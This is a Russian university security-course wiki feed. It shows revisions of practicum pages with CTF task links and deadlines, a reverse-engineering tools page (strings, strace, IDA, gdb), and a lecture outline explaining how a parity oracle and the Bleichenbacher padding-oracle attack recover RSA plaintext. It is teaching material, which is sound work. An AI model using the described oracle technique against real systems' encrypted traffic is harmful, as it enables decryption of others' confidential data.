SecSem Wiki - Вклад [ru]

Криптография/Атака Padding oracle на RSA

2026-04-17T05:39:10Z

Romankholin94: /* Ссылки */

==Мультипликативное свойство RSA==
Пусть E(M) - функция шифрования, N - модуль, X mod Y - остаток от деления X на Y. Тогда:
<pre> E(M1)E(M2) mod N = E(M1M2 mod N)</pre>
Данной свойство очевидно выводится из определения функции шифрования E(M).

==Pairing Oracle==
Разберем следующи пример: пусть есть сервис по заказу яиц. Но он позваляет заказывать только четное количество яиц. Заказы принимаются в зашифрованном RSA виде. Нужно, имея подслушанный зашифрованный текст C, получить его дешифрованный текст M.

Атака выглядит следующим образом: пусть M < N. Можно послать сервису заказ на <code>2M mod N</code> яиц (для этого нужно послать <code>(C*2^e) mod N)</code>. Тогда есть два варинта:
# <code>M > N/2</code>, тогда <code>2M mod N = 2M - N</code> - нечетное число, сервис не принимает заказ
# <code>M <= N/2</code>, тогда <code>2M mod N = 2M</code> - четное число, сервис принимает заказ
Аналогичные суждения можно сделать, домножая C на 2^ie mod N (где i - натуральное число) и, используя метод двоичного поиска, выяснить, чему же равно M.

==PKCS==
Согласно этому стандарту, паддинг текста, длина которого недостаточна для шифрования происходит следующим образом:
<span style="color:#B22222">0002</span><span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d0f95f9836b07907669f2527
eda22e1f80e6e2e4dac062326f5716fca45</span><span style="color:#FF00FF">00</span>4c65616b696e672070617269747920616c6c6f777320666f7
22064656372797074696e6720612077686f6c652052534120656e63727970746564206d6573736167650a

<span style="color:#B22222">0002</span> - первые два байта определяют тип падинга

<span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d
0f95f9836b07907669f2527eda22e1f80e6e2e4dac062326f5716fca45</span> - ненулевые случайные байты

<span style="color:#FF00FF">00</span> - сепаратор, после которого идёт собственно сам текст

==Атака Блехенбахера==
[[Файл:Padding.zip|200px|thumb|left|Описание атаки]]

==Ссылки==
* [https://docs.google.com/presentation/d/19sGLccnP5IcVm3l3ie3UJZ_nMTxu62SMCFHCd_M2fFc/edit?usp=sharing Презинтация лекции]
* [http://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf Оригинал статьи по атаке Блехенбахера]

Практикум на ЭВМ (2025)

2026-04-17T05:38:18Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 391 и 392.

* '''Когда''': по понедельникам 12:50,
* '''Где''': аудитория 790

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 392, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2025/2026 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [http://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

Доступ к заданиям осуществляется через VPN, доступы к которому можно получить у старосты.

=== Веб ===
* [[Практикум_на_ЭВМ_(2025)/Бонусное_задание|Бонусное задание]]
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 14.11.2024 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.12.2025 23:43)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2025 reverse tasks.zip|Задания по реверсу]] (deadline - 17.12.2025 23:59:59.999999 MSK)
* [[Media:2025 pwn tasks.zip|Задания по бинарной эксплутации]] (deadline - 23.12.2025 23:59:59)
* [https://drive.google.com/file/d/1QcgUUOuKrBB0zce9Er5OCAPIVTQ5jig5/view?usp=sharing task 2] <code>nc fdca:22c8:7316::1 16966</code> (deadline - 23.12.2025 23:59:59)

=== Криптография и криптоанализ ===

* RSA: [[Практикум_на_ЭВМ_(2026)/broadcast | broadcast]], [[ Практикум_на_ЭВМ_(2026)/common-sense | common-sense]] (deadline - 31.03.2026 23:53)
* [[Практикум_на_ЭВМ_(2020)/Задание_на_блочные_шифры|Задание на блочные шифры]] (deadline - 02.04.2026 23:53)
* Padding oracle: [http://even.tasks.prak.seclab.cs.msu.ru/ even], [http://bleichenbacher.tasks.prak.seclab.cs.msu.ru/ bleichenbacher] (deadline - 03.06.2026 23:59)

== Материалы ==

=== Веб ===

Семинар 1 (15 сентября 2025) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (22 сентября 2025) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (29 сентября 2025) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (6 октября 2025) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (13 октября 2025) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (20 октября 2025) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (27 октября 2025) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (10 ноября 2025) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

=== Криптография и криптоанализ ===

Семинар 1 (19 февраля 2026) [[Криптография/Асимметричная криптография на примере RSA]]

Семинар 2 (26 февраля 2026) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 3 (5 марта 2026) [[Криптография/Атака Padding oracle на RSA]]

=== Сетевая безопасность ===

Семинар 5 (19 марта 2026) [[Сетевая_безопасность/Анализ_сетевого_трафика]]

Семинар 6 (26 марта 2026) [[Сетевая безопасность/Сетевой стек и DNS]]

== Примечания ==
<references/>

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2025-11-10T19:11:40Z

Romankholin94: /* Примеры с занятия */

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA ==

Интерактивный дизассемблер и декомпилятор.

Версия IDA Free вполне подходит для наших задач, её можно [https://hex-rays.com/ida-free/ скачать с официального сайта]. Ссылки на скачивание могут не открываться из РФ, вот на всякий случай зеркала:

* https://course.secsem.ru/idafree83_linux.run
* https://course.secsem.ru/idafree83_windows.exe
* https://course.secsem.ru/idafree83_mac.app.zip

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== Режим дизассемблера ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)

==== Режим декомпилятора (Hex-Rays) ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.
* <code>info proc mappings</code> - показать карту памяти процесса

== Примеры с занятия ==

Бинарник, который были рассмотрен на семинаре: [[Media:Reverse examples 2025.zip]].

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2025-11-10T19:11:22Z

Romankholin94: /* Примеры с занятия */

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2025-11-10T19:11:10Z

Romankholin94: /* Примеры с занятия */

Файл:Reverse examples 2025.zip

2025-11-10T19:10:28Z

Romankholin94:

Практикум на ЭВМ (2025)

2025-11-10T19:09:50Z

Romankholin94: /* Веб */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 391 и 392.

* '''Когда''': по понедельникам 12:50,
* '''Где''': аудитория 790

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 392, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2025/2026 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [http://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

Доступ к заданиям осуществляется через VPN, доступы к которому можно получить у старосты.

=== Веб ===
* [[Практикум_на_ЭВМ_(2025)/Бонусное_задание|Бонусное задание]]
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 14.11.2024 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

=== Криптография и криптоанализ ===

== Материалы ==

=== Веб ===

Семинар 1 (15 сентября 2025) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (22 сентября 2025) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (29 сентября 2025) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (6 октября 2025) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (13 октября 2025) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (20 октября 2025) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (27 октября 2025) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (10 ноября 2025) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

=== Криптография и криптоанализ ===

=== Сетевая безопасность ===

== Примечания ==
<references/>

Практикум на ЭВМ (2025)

2025-11-10T19:09:32Z

Romankholin94: /* Реверс-инжиниринг и бинарная эксплуатация */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 391 и 392.

* '''Когда''': по понедельникам 12:50,
* '''Где''': аудитория 790

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 392, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2025/2026 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [http://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

Доступ к заданиям осуществляется через VPN, доступы к которому можно получить у старосты.

=== Веб ===
* [[Практикум_на_ЭВМ_(2025)/Бонусное_задание|Бонусное задание]]
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 14.11.2024 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

=== Криптография и криптоанализ ===

== Материалы ==

=== Веб ===

Семинар 1 (15 сентября 2025) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (22 сентября 2025) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (29 сентября 2025) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (6 октября 2025) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (13 октября 2025) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (20 октября 2024) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (27 октября 2024) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (10 ноября 2025) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

=== Криптография и криптоанализ ===

=== Сетевая безопасность ===

== Примечания ==
<references/>

Практикум на ЭВМ (2024)

2025-03-20T11:33:07Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 645

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2024/2025 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===
* [[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 07.10.2024 23:43)
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 17.10.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 17.10.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 17.10.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 13.11.2024 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 26.11.2024 23:59)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 26.11.2024 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [https://drive.google.com/file/d/19qIXrbhGyFUAHY-fG3pTlpse4GLLRgr7/view?usp=sharing task 1] nc 91.214.70.136 16971 (deadline - 17.12.2024 23:59)
* [https://drive.google.com/file/d/1Mw_BkNZ-QBkbQrRXLtZLkd3FypMdHp-d/view?usp=sharing task 2] nc 91.214.70.136 16972 (deadline - 17.12.2024 23:59)
* [https://drive.google.com/file/d/1IhG_OD6BDIS4TA_0QXrNxlRqU0xMcV_R/view?usp=sharing task 3] nc 91.214.70.136 16973 (deadline - 17.12.2024 23:59)
* [https://drive.google.com/file/d/1KF992P4Vt3i_7Hr2O6qPCxb5GOzPBXK8/view?usp=sharing task 4] nc tasks.prak.seclab.cs.msu.ru 16974 (deadline - 17.12.2024 23:59)
* [[Media:2024-pwn-tasks.zip |task 5]] nc tasks.prak.seclab.cs.msu.ru 16977 (deadline - 20.12.2024 23:59:59)
* [https://drive.google.com/file/d/1QcgUUOuKrBB0zce9Er5OCAPIVTQ5jig5/view?usp=sharing task 6] nc tasks.prak.seclab.cs.msu.ru 16966 (deadline - 20.12.2024 23:59:59)

=== Криптография и криптоанализ ===

* RSA: [https://khashaev.ru/secsem/rsa/#broadcast broadcast], [https://khashaev.ru/secsem/rsa/#common-sense common-sense] (deadline - 20.03.2025 23:53)
* [[Практикум_на_ЭВМ_(2020)/Задание_на_блочные_шифры|Задание на блочные шифры]] (deadline - 24.03.2024 23:53)
* Padding oracle: [http://even.tasks.prak.seclab.cs.msu.ru/ even], [http://bleichenbacher.tasks.prak.seclab.cs.msu.ru/ bleichenbacher] (deadline - 03.04.2025 23:59)

== Материалы ==

=== Веб ===

Семинар 1 (9 сентября 2024) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (16 сентября 2024) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (23 сентября 2024) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (30 сентября 2024) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (7 октября 2024) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (14 октября 2024) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (21 октября 2024) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (28 октября 2024) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 9 (25 ноября 2024) [[Бинарные_уязвимости/Переполнение_стека | Бинарные_уязвимости/Переполнение_стека_1]]

Семинар 10 (2 декабря 2024) [[Бинарные_уязвимости/Stack_overflow | Бинарные_уязвимости/Переполнение_стека_2]] [[Бинарные_уязвимости/Off-by-one]]

=== Криптография и криптоанализ ===

Семинар 1 (20 февраля 2025) [[Криптография/Асимметричная криптография на примере RSA]]

Семинар 2 (27 февраля 2025) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 3 (6 марта 2025) [[Криптография/Атака Padding oracle на RSA]]

== Примечания ==
<references/>

Практикум на ЭВМ (2024)

2025-03-20T11:32:17Z

Romankholin94: /* Криптография и криптоанализ */

Практикум на ЭВМ (2024)

2024-10-29T05:55:36Z

Romankholin94: /* Материалы */

Практикум на ЭВМ (2023)

2024-05-16T22:00:09Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по четвергам, 10:30
* '''Где''': аудитория 790 или 71

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru/</s> (dedline - 23.11.2023 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)
* [[Media:2023 pwn tasks.tar.gz|Задания по бинарной эксплутации]] (deadline - 17.12.2023 23:59:59.999999 MSK)

=== Криптография и криптоанализ ===

* Padding oracle: [http://even.tasks.prak.seclab.cs.msu.ru/ even], [http://bleichenbacher.tasks.prak.seclab.cs.msu.ru/ bleichenbacher] (deadline - 01.05.2024 23:59)
* RSA: [https://khashaev.ru/secsem/rsa/#broadcast broadcast], [https://khashaev.ru/secsem/rsa/#common-sense common-sense] (deadline - 1.04.2024 23:53)
* [[Практикум_на_ЭВМ_(2020)/Задание_на_блочные_шифры|Задание на блочные шифры]] (deadline - 24.03.2024 23:53)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (23 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (20 ноября 2022) [[Бинарные_уязвимости/Переполнение_стека]]

Семинар 11 (27 ноября 2022) [[Бинарные_уязвимости/ROP]]

=== Криптография и криптоанализ ===

Семинар 1 (22 февраля 2024) [[Криптография/Асимметричная криптография на примере RSA]]

Семинар 2 (29 февраля 2021) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 4 (14 марта 2021) [[Криптография/Атака Padding oracle на RSA]]

=== Сетевая безопасность ===

Семинар 5 (4 апреля 2024) [[Сетевая безопасность/Анализ сетевого трафика]]

Семинар 6 (11 апреля 2024) [[Сетевая безопасность/Сетевой стек и DNS]]

== Примечания ==
<references/>

Практикум на ЭВМ (2023)

2024-04-10T19:26:08Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по четвергам, 10:30
* '''Где''': аудитория 790 или 71

